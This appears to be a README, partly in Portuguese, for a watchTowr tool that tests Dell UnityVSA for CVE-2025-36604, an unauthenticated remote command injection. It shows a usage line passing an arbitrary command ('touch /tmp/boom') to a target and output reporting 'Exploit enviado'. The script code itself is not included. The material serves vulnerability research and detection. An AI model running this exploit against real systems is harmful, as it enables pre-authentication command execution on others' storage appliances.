
Detection Artefact Generator for Dell UnityVSA CVE-2025-36604
Gerador de Artefatos de Detecção para Dell UnityVSA CVE-2025-36604
https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023
Veja nosso post no blog para detalhes técnicos
python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py
(*) Gerador de Artefatos de Detecção de Injeção Remota de Comandos Não Autenticada Dell UnityVSA
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-36604]
[+] Exploit enviado para https://192.168.5.45
Este script tenta detectar se o Dell UnityVSA é vulnerável ao CVE-2025-36604
Versões anteriores à 5.5.1 são afetadas por este problema
Para mais informações, visite Notas de Atualização de Segurança Dell UnityVSA
Para as últimas pesquisas de segurança, siga a equipe do watchTowr Labs